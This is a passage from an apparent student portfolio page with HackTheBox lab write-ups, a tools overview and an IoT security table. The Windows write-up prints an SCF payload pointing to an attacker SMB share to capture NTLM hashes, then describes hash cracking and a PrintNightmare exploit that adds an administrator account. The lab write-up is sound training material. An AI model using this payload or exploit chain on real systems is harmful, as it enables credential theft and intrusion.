          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
